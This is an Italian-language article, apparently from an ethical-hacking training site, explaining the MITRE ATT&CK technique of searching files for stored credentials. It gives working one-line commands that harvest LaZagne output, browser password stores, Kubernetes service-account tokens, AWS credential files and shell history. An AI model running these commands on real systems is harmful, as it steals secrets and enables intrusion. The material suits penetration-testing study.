Ricerca di Credenziali nei File: Credentials In Files (T1552.001)

Gli attaccanti cercano credenziali insicure memorizzate in file locali e condivisioni remote. Questa tecnica sfrutta configurazioni che contengono password in chiaro, file creati dagli utenti per memorizzare le proprie credenziali o codice sorgente con password hardcoded.

La ricerca può avvenire su backup, macchine virtuali salvate o preferenze di Group Policy sui Domain Controller Windows. 14 gruppi APT utilizzano attivamente questa tecnica, tra cui APT3, OilRig e Scattered Spider. I target includono configurazioni di browser, client FTP, Outlook e persino ambienti cloud dove le credenziali sono memorizzate in file di configurazione locali o log di container.

Questa tecnica appartiene alla tattica TA0006 - Credential Access, la fase della kill chain dove l'attaccante cerca di rubare credenziali per muoversi lateralmente o elevare i privilegi nel sistema compromesso.

La ricerca di credenziali inizia sempre dai "soliti sospetti". Su Windows, LaZagne automatizza la ricerca in decine di applicazioni:

python lazagne.py all

Per una ricerca manuale più mirata, su Linux cerca nei file di configurazione comuni:

grep -r "password" /etc/ 2>/dev/null find /home -name ".env" -o -name ".conf" 2>/dev/null | xargs grep -i "pass"

I browser sono miniere d'oro. Firefox memorizza le credenziali in logins.json:

cat ~/.mozilla/firefox//logins.json | jq*

Per Chrome su macOS, il database delle password è accessibile (se hai i privilegi):

sqlite3 ~/Library/Application\ Support/Google/Chrome/Default/Login\ Data "SELECT origin_url, username_value, password_value FROM logins"

Negli ambienti containerizzati, i secret sono spesso montati come file. Cerca nei pod Kubernetes:

find /var/run/secrets -type f 2>/dev/null cat /run/secrets/kubernetes.io/serviceaccount/token

Per AWS, le credenziali locali sono il primo obiettivo:

cat ~/.aws/credentials cat ~/.aws/config

Non dimenticare i file di history che potrebbero contenere password passate come argomenti:

history | grep -E "mysql -u|psql|redis-cli"

Vuoi diventare un Ethical Hacker ma non sai da dove iniziare?

Scarica la guida gratuita e segui il percorso corretto fin dal primo passo